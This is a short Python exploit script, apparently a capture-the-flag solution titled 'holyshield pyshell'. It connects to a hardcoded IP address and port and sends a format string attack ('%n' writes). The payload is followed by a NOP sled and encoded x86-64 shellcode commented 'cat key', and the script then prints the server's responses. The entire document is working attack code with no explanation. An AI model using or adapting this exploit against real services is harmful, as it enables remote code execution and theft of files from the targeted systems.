holyshield pyshell

import os
import sys
from struct import *
from socket import *
import time

s = socket(AF_INET, SOCK_STREAM)
s.connect(('210.126.48.194', 34567))
s.recv(1)
s.send('get\n')
print s.recv(1024)

fsb = "221.161.111.84_payload "+"%8x"*58+"%6299184c%n%400c%61$n"
# cat key
shellcode = "\x48\x31\xc9\x48\x81\xe9\xf9\xff\xff\xff\x48\x8d\x05\xef" +\
"\xff\xff\xff\x48\xbb\xdc\x47\x7e\x70\xa4\x37\x42\xbf\x48" +\
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xb6\x7c\x26" +\
"\xe9\xec\x8c\x6d\xdd\xb5\x29\x51\x03\xcc\x37\x11\xf7\x55" +\
"\xa0\x16\x5d\xc7\x37\x42\xf7\x55\xa1\x2c\x98\xa9\x37\x42" +\
"\xbf\xf3\x25\x17\x1e\x8b\x54\x23\xcb\xfc\x2c\x1b\x09\xa4" +\
"\x61\x15\xf7\x55\xa1\x71\x75\xa4\x37\x42\xbf"

last = fsb + "\x90"*(1000-len(fsb)-len(shellcode)) + shellcode
s.send(last)
s.recv(35)
new = "1"
data = ""
while len(new) != 0:
        time.sleep(1)
        new = s.recv(60000)
        print new
s.close()